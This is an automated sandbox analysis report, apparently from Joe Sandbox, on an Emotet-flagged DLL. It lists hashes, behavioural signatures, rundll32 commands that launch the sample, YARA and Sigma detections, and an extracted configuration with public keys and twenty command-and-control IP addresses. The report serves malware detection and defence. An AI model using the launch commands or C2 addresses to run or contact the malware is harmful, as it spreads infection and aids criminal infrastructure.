Play interactive tour

Edit tour

Windows Analysis Report tUJXpPwU27

Overview

General Information

Sample Name:	tUJXpPwU27 (renamed file extension from none to dll)
Analysis ID:	528351
MD5:	15239e7be7ce6bfaf0681eb66bcde356
SHA1:	55dc2a27f408bf6437224ecfc62cc01a3311ec08
SHA256:	79036368e6229fa1c4eb724a34e4d10973feaa85628058f4ac1eaac6c1fcf19c
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Emotet

Sigma detected: Emotet RunDLL32 Process Creation

Found potential dummy code loops (likely to delay analysis)

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6984 cmdline: loaddll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6996 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 7016 cmdline: rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6044 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7004 cmdline: rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6696 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cilqlpbnkp\gwjznuxweg.czu",ligDrVSARhbsLaD MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5904 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cilqlpbnkp\gwjznuxweg.czu",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7068 cmdline: rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,aocchppr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4972 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7088 cmdline: rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,atibsyaucowikobny MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4664 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7128 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 6336 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5252 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1000235837.000000000099C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.977580541.0000000002CEA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.997848622.0000000002E95000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.997168710.00000000006AA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.1134773374.0000000000A6A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.998474628.000000000089A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.rundll32.exe.a85f00.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.6c4390.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.8b4350.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.6c4390.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.8b4350.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.2d042a8.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.2d042a8.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.a85f00.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 3 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cilqlpbnkp\gwjznuxweg.czu",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cilqlpbnkp\gwjznuxweg.czu",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cilqlpbnkp\gwjznuxweg.czu",ligDrVSARhbsLaD, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6696, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cilqlpbnkp\gwjznuxweg.czu",Control_RunDLL, ProcessId: 5904

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.2.rundll32.exe.2d042a8.1.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Multi AV Scanner detection for submitted file

Show sources

Source: tUJXpPwU27.dll	Virustotal: Detection: 41%			Perma Link
Source: tUJXpPwU27.dll	ReversingLabs: Detection: 48%

Source: tUJXpPwU27.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: tUJXpPwU27.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7FC8C1 FindFirstFileExA,		0_2_6E7FC8C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7FC8C1 FindFirstFileExA,		2_2_6E7FC8C1

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190
Source: Joe Sandbox View	IP Address: 78.46.73.125 78.46.73.125

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 8.2.rundll32.exe.a85f00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6c4390.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.8b4350.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6c4390.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.8b4350.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2d042a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2d042a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.a85f00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1000235837.000000000099C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.977580541.0000000002CEA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.997848622.0000000002E95000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.997168710.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1134773374.0000000000A6A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.998474628.000000000089A000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Source: tUJXpPwU27.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Cilqlpbnkp\gwjznuxweg.czu:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Cilqlpbnkp\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D6430	0_2_6E7D6430
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D5580	0_2_6E7D5580
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7F2E50	0_2_6E7F2E50
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E800FF9	0_2_6E800FF9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7E9F89	0_2_6E7E9F89
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7E9CDF	0_2_6E7E9CDF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7DED30	0_2_6E7DED30
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7FBDD1	0_2_6E7FBDD1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D28D0	0_2_6E7D28D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7E98C0	0_2_6E7E98C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7E996D	0_2_6E7E996D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E802744	0_2_6E802744
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7EA50B	0_2_6E7EA50B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7EA250	0_2_6E7EA250
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7ED32D	0_2_6E7ED32D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7E7307	0_2_6E7E7307
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7E1300	0_2_6E7E1300
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7ED0FD	0_2_6E7ED0FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7D6430	2_2_6E7D6430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7D5580	2_2_6E7D5580
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7F2E50	2_2_6E7F2E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E800FF9	2_2_6E800FF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7E9F89	2_2_6E7E9F89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7E9CDF	2_2_6E7E9CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7DED30	2_2_6E7DED30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7FBDD1	2_2_6E7FBDD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7D28D0	2_2_6E7D28D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7E98C0	2_2_6E7E98C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7E996D	2_2_6E7E996D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E802744	2_2_6E802744
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7EA50B	2_2_6E7EA50B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7EA250	2_2_6E7EA250
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7ED32D	2_2_6E7ED32D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7E7307	2_2_6E7E7307
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7E1300	2_2_6E7E1300
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7ED0FD	2_2_6E7ED0FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B441E	3_2_007B441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CCAA8	3_2_007CCAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C43B3	3_2_007C43B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B1C76	3_2_007B1C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C406E	3_2_007C406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B9A57	3_2_007B9A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B2654	3_2_007B2654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BA048	3_2_007BA048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B2043	3_2_007B2043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B2A46	3_2_007B2A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CE441	3_2_007CE441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B3845	3_2_007B3845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007D1A3C	3_2_007D1A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CF83F	3_2_007CF83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BD223	3_2_007BD223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B9E22	3_2_007B9E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C5220	3_2_007C5220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BEC27	3_2_007BEC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BF41F	3_2_007BF41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BE21C	3_2_007BE21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C1C10	3_2_007C1C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B1A0A	3_2_007B1A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B220A	3_2_007B220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B8C09	3_2_007B8C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B4C00	3_2_007B4C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CDEF4	3_2_007CDEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CA8F0	3_2_007CA8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B30F6	3_2_007B30F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CAEEB	3_2_007CAEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CECE3	3_2_007CECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C0ADE	3_2_007C0ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CCCD4	3_2_007CCCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007D08D1	3_2_007D08D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C7ED1	3_2_007C7ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CBEC9	3_2_007CBEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C98BD	3_2_007C98BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C90BA	3_2_007C90BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B5AB2	3_2_007B5AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BDAAE	3_2_007BDAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C44AA	3_2_007C44AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C78A5	3_2_007C78A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BFEA0	3_2_007BFEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CD6A7	3_2_007CD6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CAC9B	3_2_007CAC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B3C91	3_2_007B3C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CD091	3_2_007CD091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BAC95	3_2_007BAC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C4E8A	3_2_007C4E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C748A	3_2_007C748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BCC8D	3_2_007BCC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B7283	3_2_007B7283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007D0687	3_2_007D0687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C577E	3_2_007C577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C056A	3_2_007C056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C1F6B	3_2_007C1F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BC158	3_2_007BC158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B3F5C	3_2_007B3F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CF14D	3_2_007CF14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B3345	3_2_007B3345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007D1343	3_2_007D1343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007D0B34	3_2_007D0B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007D292B	3_2_007D292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B5923	3_2_007B5923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B6B25	3_2_007B6B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B251C	3_2_007B251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CFD10	3_2_007CFD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B2309	3_2_007B2309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B3502	3_2_007B3502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BC5FE	3_2_007BC5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007D03F1	3_2_007D03F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B55E8	3_2_007B55E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CBFE8	3_2_007CBFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BA3DF	3_2_007BA3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007D25C3	3_2_007D25C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B6FC4	3_2_007B6FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CB1B5	3_2_007CB1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BBFB6	3_2_007BBFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C7BB2	3_2_007C7BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C4BAA	3_2_007C4BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C9DA1	3_2_007C9DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C2FA2	3_2_007C2FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CD99A	3_2_007CD99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BFD91	3_2_007BFD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CB397	3_2_007CB397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007D1193	3_2_007D1193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007C4D8D	3_2_007C4D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B758F	3_2_007B758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B4F8E	3_2_007B4F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B9384	3_2_007B9384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063441E	4_2_0063441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064CAA8	4_2_0064CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_006443B3	4_2_006443B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064406E	4_2_0064406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00631C76	4_2_00631C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00632043	4_2_00632043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00632A46	4_2_00632A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064E441	4_2_0064E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00633845	4_2_00633845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063A048	4_2_0063A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00639A57	4_2_00639A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00632654	4_2_00632654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063D223	4_2_0063D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00639E22	4_2_00639E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00645220	4_2_00645220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063EC27	4_2_0063EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00651A3C	4_2_00651A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064F83F	4_2_0064F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00634C00	4_2_00634C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00631A0A	4_2_00631A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063220A	4_2_0063220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00638C09	4_2_00638C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00641C10	4_2_00641C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063F41F	4_2_0063F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063E21C	4_2_0063E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064ECE3	4_2_0064ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064AEEB	4_2_0064AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064DEF4	4_2_0064DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064A8F0	4_2_0064A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_006330F6	4_2_006330F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064BEC9	4_2_0064BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064CCD4	4_2_0064CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_006508D1	4_2_006508D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00647ED1	4_2_00647ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00640ADE	4_2_00640ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_006478A5	4_2_006478A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063FEA0	4_2_0063FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064D6A7	4_2_0064D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063DAAE	4_2_0063DAAE
